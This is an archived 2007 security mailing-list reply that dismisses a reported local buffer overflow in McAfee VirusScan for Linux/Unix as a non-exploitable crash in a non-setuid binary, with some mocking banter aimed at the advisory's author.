Date: Wed, 15 Aug 2007 10:39:07 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>,
	<sebastian@...fgarten.com>
Subject: Re: McAfee Virus Scan for Linux and Unix v5.10.0
	Local Buffer Overflow

Where does security come into play here? This is a local crash in a
non setuid binary. I would like to hear your remote exploitation
scenario. Or perhaps your local privilege escalation scenario?

P.S. We all know this advisory is bullshit, you should have sold it
to WabiSabiLabi LOLOLOL

--
Click to become a master chef, own a restaurant and make millions.
http://tagline.hushmail.com/fc/Ioyw6h4eAFZexjoyRjzeiNugNCYHByYgDcZbE142fg5zU8vki64fmI/